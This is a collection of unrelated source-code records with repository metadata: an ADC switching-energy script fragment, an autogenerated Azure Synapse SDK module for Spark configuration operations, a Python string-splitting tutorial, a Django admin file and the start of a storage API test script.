v_cap = np.zeros((n, 2, n))
v_cap[0] = v_x[0] - cap_connect[0]
for k in range(1, n):
# if up-switching: the capacitor with index k-1 in the main capacitor array will be charged to V_ref,
# and the capacitor with same index remains charged to V_ref; if down-switching: the capacitor
# with index k-1 in the sub-capacitor array will be discharged to ground, and the capacitor with the
# same index remains discharged.
cap_connect[k:, :, k - 1] = sw_process[k]
v_x[k] = np.sum(np.multiply(weights_ideal, cap_connect[k]))
v_cap[k] = v_x[k] - cap_connect[k]
# find index of the capacitors charged to the reference
# voltage
c_t_index = np.where(
cap_connect[k] == 1.0) # 2-dimensional index
# energy = - V_ref * ∑(c_t[j] * ∆v_cap[j])
# attention that v_cap is 3d-array, the the slicing index
# should also be 3-dimensional
sw_energy[k] = - np.inner(cap_ideal[c_t_index],
(v_cap[k,c_t_index[0],
c_t_index[-1]] - v_cap[k - 1, c_t_index[0], c_t_index[-1]]))
sw_energy_sum[i] = np.sum(sw_energy)
return coefficient * sw_energy_sum
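# --- usage sketch (assumption: run from the project root so that
# assistant_module.get_decision_path is importable) ---
if __name__ == '__main__':
    # average switching energy (in units of C0*Vref^2) of a 10-bit conventional ADC
    energy = get_energy(10, switch='conventional', structure='conventional')
    print('mean switching energy: %.2f C*Vref^2' % energy.mean())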
|
[
"lfc199471@gmail.com"
] |
lfc199471@gmail.com
|
90352a180e75d18219b8cba394d4d2b8f03de187
|
aa0270b351402e421631ebc8b51e528448302fab
|
/sdk/synapse/azure-synapse-artifacts/azure/synapse/artifacts/operations/_spark_configuration_operations.py
|
9d5b1194a4b1cae79ac490bbe3402239b826e729
|
[
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
fangchen0601/azure-sdk-for-python
|
d04a22109d0ff8ff209c82e4154b7169b6cb2e53
|
c2e11d6682e368b2f062e714490d2de42e1fed36
|
refs/heads/master
| 2023-05-11T16:53:26.317418
| 2023-05-04T20:02:16
| 2023-05-04T20:02:16
| 300,440,803
| 0
| 0
|
MIT
| 2020-10-16T18:45:29
| 2020-10-01T22:27:56
| null |
UTF-8
|
Python
| false
| false
| 33,298
|
py
|
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar, Union, cast
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.polling.base_polling import LROBasePolling
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from .. import models as _models
from .._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_get_spark_configurations_by_workspace_request(**kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations")
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_create_or_update_spark_configuration_request(
spark_configuration_name: str, *, if_match: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if if_match is not None:
_headers["If-Match"] = _SERIALIZER.header("if_match", if_match, "str")
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_spark_configuration_request(
spark_configuration_name: str, *, if_none_match: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if if_none_match is not None:
_headers["If-None-Match"] = _SERIALIZER.header("if_none_match", if_none_match, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_delete_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="DELETE", url=_url, params=_params, headers=_headers, **kwargs)
def build_rename_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}/rename")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
class SparkConfigurationOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.synapse.artifacts.ArtifactsClient`'s
:attr:`spark_configuration` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def get_spark_configurations_by_workspace(self, **kwargs: Any) -> Iterable["_models.SparkConfigurationResource"]:
"""Lists sparkconfigurations.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SparkConfigurationResource or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.synapse.artifacts.models.SparkConfigurationResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[_models.SparkConfigurationListResponse] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_get_spark_configurations_by_workspace_request(
api_version=api_version,
template_url=self.get_spark_configurations_by_workspace.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
else:
request = HttpRequest("GET", next_link)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("SparkConfigurationListResponse", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return ItemPaged(get_next, extract_data)
get_spark_configurations_by_workspace.metadata = {"url": "/sparkconfigurations"}
def _create_or_update_spark_configuration_initial(
self,
spark_configuration_name: str,
properties: _models.SparkConfiguration,
if_match: Optional[str] = None,
**kwargs: Any
) -> Optional[_models.SparkConfigurationResource]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None)
_spark_configuration = _models.SparkConfigurationResource(properties=properties)
_json = self._serialize.body(_spark_configuration, "SparkConfigurationResource")
request = build_create_or_update_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
if_match=if_match,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def begin_create_or_update_spark_configuration(
self,
spark_configuration_name: str,
properties: _models.SparkConfiguration,
if_match: Optional[str] = None,
**kwargs: Any
) -> LROPoller[_models.SparkConfigurationResource]:
"""Creates or updates a sparkconfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param properties: Properties of Spark Configuration. Required.
:type properties: ~azure.synapse.artifacts.models.SparkConfiguration
:param if_match: ETag of the sparkConfiguration entity. Should only be specified for update,
for which it should match existing entity or can be * for unconditional update. Default value
is None.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either SparkConfigurationResource or the result
of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.synapse.artifacts.models.SparkConfigurationResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[_models.SparkConfigurationResource] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._create_or_update_spark_configuration_initial(
spark_configuration_name=spark_configuration_name,
properties=properties,
if_match=if_match,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def get_spark_configuration(
self, spark_configuration_name: str, if_none_match: Optional[str] = None, **kwargs: Any
) -> Optional[_models.SparkConfigurationResource]:
"""Gets a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param if_none_match: ETag of the sparkConfiguration entity. Should only be specified for get.
If the ETag matches the existing entity tag, or if * was provided, then no content will be
returned. Default value is None.
:type if_none_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SparkConfigurationResource or None or the result of cls(response)
:rtype: ~azure.synapse.artifacts.models.SparkConfigurationResource or None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None)
request = build_get_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
if_none_match=if_none_match,
api_version=api_version,
template_url=self.get_spark_configuration.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 304]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
def _delete_spark_configuration_initial( # pylint: disable=inconsistent-return-statements
self, spark_configuration_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
api_version=api_version,
template_url=self._delete_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
_delete_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def begin_delete_spark_configuration(self, spark_configuration_name: str, **kwargs: Any) -> LROPoller[None]:
"""Deletes a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._delete_spark_configuration_initial( # type: ignore
spark_configuration_name=spark_configuration_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
def _rename_spark_configuration_initial( # pylint: disable=inconsistent-return-statements
self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[None] = kwargs.pop("cls", None)
_request = _models.ArtifactRenameRequest(new_name=new_name)
_json = self._serialize.body(_request, "ArtifactRenameRequest")
request = build_rename_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._rename_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
_rename_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
@distributed_trace
def begin_rename_spark_configuration(
self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any
) -> LROPoller[None]:
"""Renames a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param new_name: New name of the artifact. Default value is None.
:type new_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._rename_spark_configuration_initial( # type: ignore
spark_configuration_name=spark_configuration_name,
new_name=new_name,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_rename_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
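# Usage sketch (assumptions: this operations group is exposed on the service client as
# `client.spark_configuration`; the configuration names below are illustrative):
#
#     poller = client.spark_configuration.begin_rename_spark_configuration(
#         spark_configuration_name="my-conf", new_name="my-conf-v2")
#     poller.result()  # block until the long-running rename completes (returns None)
#
#     # fire the initial request without polling for completion
#     client.spark_configuration.begin_delete_spark_configuration("my-conf", polling=False)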
authors: ["noreply@github.com"] | author_id: fangchen0601.noreply@github.com
blob_id: 04a4e80f246a131d68d2616fcf175a178c694d71 | directory_id: d87d83049f28da72278ca9aa14986db859b6c6d6 | content_id: 91db33efa0f6d30926f416fb183b4cd31e8ff63d
path: /basic/coreFundamental/split_And_Join_And_strip/splitDemo.py | repo_name: MonadWizard/python-basic | detected_licenses: [] | license_type: no_license
snapshot_id: 6507c93dc2975d6450be27d08fb219a3fd80ed64 | revision_id: 624f393fcd19aeeebc35b4c2225bb2fe8487db39 | branch_name: refs/heads/master
visit_date: 2021-07-21T16:12:58.251456 | revision_date: 2020-10-12T19:46:21 | committer_date: 2020-10-12T19:46:21 | github_id: 223,625,523 | stars: 1 | forks: 0
gha_license_id: null | gha_event_created_at: 2019-11-23T18:01:43 | gha_created_at: 2019-11-23T17:14:21 | gha_language: HTML
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,046 | extension: py
s = 'this is a string of words'
print(s.split())
print("""
""")
print('That is also a string'.split())
print("""
""")
print(s.split('i'))
print("""
""")
words = s.split()
print(words)
for w in words:
print(w)
# rsplit
demo = "this is a fucked up"
rsplitee = demo.rsplit(sep=" ", maxsplit=2)
print(rsplitee)
# split with maxsplit (splits from the left; there is no str.lsplit)
demo = "this is a fucked up"
lsplitee = demo.split(sep=" ", maxsplit=2)
print(lsplitee)
# splitlines splits on line breaks (\n)
demo = "this is a fucked up\nfucking univers"
nsplitee = demo.splitlines()
print(nsplitee)
# test
file = """mtv films election, a high school comedy, is a current example
from there, director steven spielberg wastes no time, taking us into the water on a midnight swim
"""
file_split = file.splitlines()
# Print file_split
print(file_split)
# Complete for-loop to split by commas
for substring in file_split:
substring_split = substring.split(",")
print(substring_split)
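# Complementary sketch (not in the original file): join and strip, the other two methods
# named by this directory. join is the inverse of split; strip trims edge characters.
rejoined = " ".join(words)
print(rejoined == s)                 # True: joining the split words rebuilds the sentence
padded = "   hello world \n"
print(padded.strip())                # 'hello world'
print(padded.rstrip("\n "))          # strips only the given characters, from the right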
authors: ["monad.wizar.r@gmail.com"] | author_id: monad.wizar.r@gmail.com
blob_id: b799cd1b2094b8b6d385a69a3678787901adbe06 | directory_id: 471e1738186b51373aa73057d91bbdb2575be6d6 | content_id: fd6fa9091a51a4000f772d4e4fb55386e31f74a4
path: /anuario/pesquisador/admin.py | repo_name: pixies/portal-anuario-pesquisa | detected_licenses: [] | license_type: no_license
snapshot_id: 1939c074ba9a70d715c0c48b07741364161a77b8 | revision_id: 38873ec820ac75977ba2f989b1a472e1b9c62a4a | branch_name: refs/heads/master
visit_date: 2021-01-12T17:49:37.337465 | revision_date: 2016-09-29T17:10:05 | committer_date: 2016-09-29T17:10:05 | github_id: 69,398,984 | stars: 0 | forks: 0
gha_license_id: null | gha_event_created_at: 2016-09-27T21:11:15 | gha_created_at: 2016-09-27T21:11:15 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 209 | extension: py
from django.contrib import admin
from .models import Pesquisador, Curso, Instituicao
# Register your models here.
admin.site.register(Pesquisador)
#admin.site.register(Curso)
#admin.site.register(Instituicao)
authors: ["eu@cflb.co"] | author_id: eu@cflb.co
blob_id: d1877db7913e58c396ec934ebb1dc1c993bcbbb5 | directory_id: 892dd32ee0be7135cd33c875b06dcc66307dcc99 | content_id: b82a09a932deb898ea00bc911d3867e80a4c52da
path: /automation/MPTS/verifyIqn.py | repo_name: cloudbytestorage/devops | detected_licenses: [] | license_type: no_license
snapshot_id: 6d21ed0afd752bdde8cefa448d4433b435493ffa | revision_id: b18193b08ba3d6538277ba48253c29d6a96b0b4a | branch_name: refs/heads/master
visit_date: 2020-05-29T08:48:34.489204 | revision_date: 2018-01-03T09:28:53 | committer_date: 2018-01-03T09:28:53 | github_id: 68,889,307 | stars: 4 | forks: 8
gha_license_id: null | gha_event_created_at: 2017-11-30T08:11:39 | gha_created_at: 2016-09-22T05:53:44 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 5,429 | extension: py
import json
import sys
import time
from time import ctime
from cbrequest import configFile, executeCmd, executeCmdNegative, resultCollection, getoutput
config = configFile(sys.argv);
stdurl = 'https://%s/client/api?apikey=%s&response=%s&' %(config['host'], config['apikey'], config['response'])
negativeFlag = 0
if len(sys.argv)== 3:
if sys.argv[2].lower()== "negative":
negativeFlag = 1;
else:
print "Argument is not correct.. Correct way as below"
print " python verifyIqn.py config.txt"
print " python verifyIqn.py config.txt negative"
exit()
